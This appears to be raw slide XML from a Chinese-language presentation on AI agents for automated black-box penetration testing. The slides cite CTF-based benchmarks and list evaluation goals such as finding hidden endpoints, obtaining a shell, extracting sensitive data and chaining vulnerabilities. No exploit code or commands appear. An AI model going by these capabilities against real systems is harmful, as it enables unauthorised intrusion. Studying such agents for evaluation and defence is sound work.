            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3220085" y="2981325"/>
            <a:ext cx="1183005" cy="373380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:no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巨大</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鸿沟</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9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296035" y="4267835"/>
            <a:ext cx="2428240" cy="373380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:no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静态知识</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vs. </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动态操作</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3483610" y="4267835"/>
            <a:ext cx="3575050" cy="373380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:no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孤立知识点</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vs. </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多步</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复杂流程</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1" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6325870" y="4267835"/>
            <a:ext cx="3280410" cy="373380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:no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理论最优解</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vs. </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实战</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适应性</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2" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8948420" y="4267835"/>
            <a:ext cx="3280410" cy="373380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:no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结果判断简单</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 vs. </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结果验证</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复杂</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3" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431165" y="4906645"/>
            <a:ext cx="2428240" cy="373380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>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MM</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LU</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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="5474970"/>
            <a:ext cx="2428240" cy="373380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>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渗透测试</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="直接连接符 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412750" y="4734560"/>
            <a:ext cx="11448000" cy="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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="直接连接符 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412750" y="6087110"/>
            <a:ext cx="11448000" cy="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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="直接连接符 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412750" y="4174490"/>
            <a:ext cx="11448000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127125" y="4908550"/>
            <a:ext cx="242824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知道是什么</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28" name="文本框 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145540" y="5497830"/>
            <a:ext cx="242824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知道</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怎么做</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29" name="文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3620770" y="4908550"/>
            <a:ext cx="272415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孤立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:ln w="15875">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</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去上下文的知识</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切片</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30" name="文本框 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3622040" y="5497830"/>
            <a:ext cx="288925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有状态的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:ln w="15875">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</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多步骤的</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复杂流程</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31" name="文本框 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6586220" y="4908550"/>
            <a:ext cx="242824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存在唯一的</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标准答案</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32" name="文本框 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6604635" y="5497830"/>
            <a:ext cx="242824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没有固定</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答案</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33" name="文本框 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9311640" y="4908550"/>
            <a:ext cx="242824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答案对错即时可</a:t>
            </a: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判</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
        <p:nvSpPr>
          <p:cNvPr id="34" name="文本框 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9330055" y="5497830"/>
            <a:ext cx="2428240" cy="373380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:ln w="15875">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>综合大量反馈验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:ln w="15875">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体 W7" panose="020C08030202040F020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custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="259080"/>
            <a:ext cx="9474200" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pP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评估标准</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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架构的设计锚</a:t>
            </a:r>
            <a:r>
              <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点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="1033145"/>
            <a:ext cx="10168255" cy="1847850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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专有基准</a:t>
            </a:r>
            <a:r>
              <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a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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XBOW（104</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题</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a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buNone/>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覆盖多种</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CTF</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种常见的漏洞类型</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采用真实</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CTF</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夺旗结果评判</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Agent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对于漏洞利用的自动化完成度</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a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pP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a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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AutoPenBench（33</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题</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indent="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buNone/>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涵盖</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Web</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、网络、密码学等多领域，采用里程碑式评分，评估多步骤任务的自动化完成度</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l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pP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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="3107055"/>
            <a:ext cx="7920990" cy="1847850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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核心评估维度</a:t>
            </a:r>
            <a:r>
              <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20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fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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侦查覆盖率</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能否发现所有开放的端口、隐藏的路径、未引用的</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API</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端点？</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fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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漏洞检出率与误报率</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能否准确识别真实漏洞（</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TP</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），并有效降低误报（</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FP</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fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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利用成功率</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发现的漏洞能否被成功利用（例如，获取</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shell</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、提取敏感数据）？</a:t>
            </a:r>
            <a:endPar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marL="285750" lvl="0" indent="-285750" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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攻击链构建能力</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能否将多个漏洞串联，形成完整的攻击路径</a:t>
            </a:r>
            <a:r>
              <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endParaRPr lang="en-US" altLang="zh-CN" sz="16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5" name="圆角矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294640" y="3049270"/>
            <a:ext cx="8105140" cy="2274570"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8975"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg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圆角矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9127490" y="3084195"/>
            <a:ext cx="2628265" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8975"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>通过执行验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="圆角矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9127490" y="3925570"/>
            <a:ext cx="2628265" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8975"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>反思与记忆</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="圆角矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9127490" y="4766945"/>
            <a:ext cx="2628265" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8975"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solid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latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>多智能体协同</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="图片 19"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8502650" y="3928745"/>
            <a:ext cx="540000" cy="54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654050" y="2748280"/>
            <a:ext cx="6870065" cy="1414780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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架构</a:t>
            </a:r>
            <a:r>
              <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为王</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5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a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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a:t>
            </a:r>
            <a:r>
              <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黑盒渗透的实战解决方案</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040765" y="1699260"/>
            <a:ext cx="6096000" cy="768350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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PART  0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0">
              <a:ln w="15875">
                <a:noFill/>
              </a:ln>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="47000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="5000"/>
                      <a:lumOff val="95000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="8460D0">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="78000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="45000"/>
                      <a:lumOff val="55000"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
              </a:gradFill>
              <a:latin typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/tags/tag1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag12.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag14.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag15.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag16.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag17.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag18.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag20.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag21.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag22.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag23.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag24.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag25.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag26.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag27.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:214.2,&quot;left&quot;:375.8,&quot;top&quot;:137.8,&quot;width&quot;:371.5}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag28.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
